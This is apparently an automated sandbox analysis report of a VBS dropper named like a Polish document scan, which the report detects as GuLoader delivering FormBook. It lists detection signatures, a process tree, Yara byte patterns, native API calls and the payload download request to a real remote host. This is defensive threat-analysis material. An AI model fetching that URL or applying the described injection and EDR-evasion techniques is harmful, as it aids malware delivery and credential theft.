Windows Analysis Report
Zeskanowana lista przedmiot#U00f3w nr 84329.vbs

Overview

General Information

Sample name: Zeskanowana lista przedmiot#U00f3w nr 84329.vbs
Analysis ID: 1518414
MD5: 66ccc86e92b90555bef9ec7f4281cc8b
SHA1: 8ef7f0bec3beb48df154b350cae7729df9e3cb74
SHA256: 6e435f3a080733d5733beb10fd0d45f8530f9f5ebf8367ff1b4daf56d0106dc3

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found stalling execution ending in API Sleep call
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for reading data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shut down / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • wscript.exe (PID: 7036 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • temp_executable.exe (PID: 2296 cmdline: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" MD5: C9B895E1253AA2B7147BE9B1E43F2DBD)
      • temp_executable.exe (PID: 4004 cmdline: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" MD5: C9B895E1253AA2B7147BE9B1E43F2DBD)
        • RAVCpl64.exe (PID: 7620 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
          • cmdkey.exe (PID: 5772 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)
            • explorer.exe (PID: 4940 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
  • cleanup
No configs have been found
Yara matches (Source | Rule | Description | Author | Strings)

Source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security

Source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  Strings:
    • 0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security

Source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  Strings:
    • 0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security

        System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs", CommandLine|base64offset|contains: +-, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4940, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs", ProcessId: 7036, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs", CommandLine|base64offset|contains: +-, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4940, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs", ProcessId: 7036, ProcessName: wscript.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T17:20:28.125456+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49755 | 170.249.236.53 | 443 | TCP

        AV Detection

Source: Yara match | File source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: unknown | HTTPS traffic detected: 170.249.236.53:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: Binary string: wntdll.pdb source: temp_executable.exe, cmdkey.exe
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 2_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 2_2_004065AA FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 2_2_00402B75 FindFirstFileW
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_00402B75 FindFirstFileW
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_004065AA FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A304E8 4x nop then mov ebx, 00000004h
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_037104E8 4x nop then mov ebx, 00000004h
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49755 -> 170.249.236.53:443
Source: global traffic | HTTP traffic detected: GET /TkFvuYGGiJLZuopqvpi7.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: secretspark.com.bd | Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /TkFvuYGGiJLZuopqvpi7.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: secretspark.com.bd | Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: secretspark.com.bd
Source: temp_executable.exe, 00000003.00000002.20212018694.0000000002512000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: temp_executable.exe, 00000003.00000002.20212018694.0000000002512000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: temp_executable.exe, 00000003.00000002.20212018694.0000000002512000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mU
Source: temp_executable.exe, 00000003.00000002.20212018694.0000000002512000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0
Source: temp_executable.exe, 00000003.00000002.20212018694.0000000002512000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown | HTTPS traffic detected: 170.249.236.53:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 2_2_00404B0B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

        E-Banking Fraud

Source: Yara match | File source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

Source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Windows\System32\wscript.exe | COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D834E0 NtCreateMutant,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82BC0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82B90 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82EB0 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82D10 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D84260 NtSetContextThread
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D84570 NtSuspendThread
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82AC0 NtEnumerateValueKey
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82A80 NtClose
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82AA0 NtQueryInformationFile
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82A10 NtWriteFile
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82BE0 NtQueryVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82B80 NtCreateKey
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82B10 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82B00 NtQueryValueKey
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82B20 NtQueryInformationProcess
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D838D0 NtGetContextThread
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D829D0 NtWaitForSingleObject
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D829F0 NtReadFile
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82ED0 NtResumeThread
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82EC0 NtQuerySection
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82E80 NtCreateProcessEx
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82E50 NtCreateSection
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82E00 NtQueueApcThread
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82FB0 NtSetValueKey
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82F00 NtCreateFile
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82F30 NtOpenDirectoryObject
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82CD0 NtEnumerateKey
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82CF0 NtDelayExecution
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D83C90 NtOpenThread
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82C50 NtUnmapViewOfSection
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82C10 NtOpenProcess
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D83C30 NtOpenProcessToken
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82C30 NtMapViewOfSection
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82C20 NtSetInformationFile
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82DC0 NtAdjustPrivilegesToken
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82DA0 NtReadVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D82D50 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_038834E0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882B80 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882B90 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882BC0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882B00 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882B10 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882A80 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882E50 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882D10 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882CF0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882C30 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03884260 NtSetContextThread
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03884570 NtSuspendThread
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882BE0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882B20 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882AA0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882AC0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882A10 NtWriteFile
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_038829D0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_038829F0 NtReadFile
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_038838D0 NtGetContextThread
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882FB0 NtSetValueKey
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882F00 NtCreateFile
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882F30 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882E80 NtCreateProcessEx
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882EB0 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882EC0 NtQuerySection
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882ED0 NtResumeThread
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882E00 NtQueueApcThread
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882DA0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882DC0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882D50 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03883C90 NtOpenThread
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882CD0 NtEnumerateKey
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882C10 NtOpenProcess
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882C20 NtSetInformationFile
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03883C30 NtOpenProcessToken
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03882C50 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_0371F0AD NtQueryInformationProcess
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_037239A8 NtSuspendThread
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03723FC8 NtQueueApcThread
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03723698 NtSetContextThread
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03723CB8 NtResumeThread
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 2_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 2_2_004043F9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 2_2_004070FB
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 2_2_6FC32351
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_004043F9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_004070FB
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D3D2EC
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D41380
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D5E310
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E0F330
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D5B0D0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E070F1
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D400A0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32DFE076
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D551C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D6B1E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D9717A
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D3F113
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32DED130
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E1010E
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E0F6F6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E0A6C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32DC36EC
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D4C6E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D50680
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32DFD646
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D74670
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D6C600
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32DED62C
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D52760
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D5A760
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E06757
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D50445
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E075C6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E0F5C9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E1A526
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E0FA89
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D6FAA0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E0EA5B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E0CA13
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32DC4BC0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D50B10
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E0FB2E
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E078F3
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D528C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D66882
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32DC98B2
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E0F872
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D59870
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D6B870
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D36868
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D53800
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32DF0835
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E0E9A6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D4E9A0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E09ED2
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D42EE8
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E00EAD
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D51EB2
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D70E50
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32DF0E6D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E01FC6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D56FE0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E0EFBF
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E0FF63
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D5CF00
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D68CDF
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E1ACEB
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D6FCE0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32DE9C98
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E0EC60
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E06C69
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32DFEC4C
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D53C60
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D40C12
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D5AC20
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D59DD0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32DEFDF4
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D62DB0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E07D4C
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D50D69
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32E0FD27
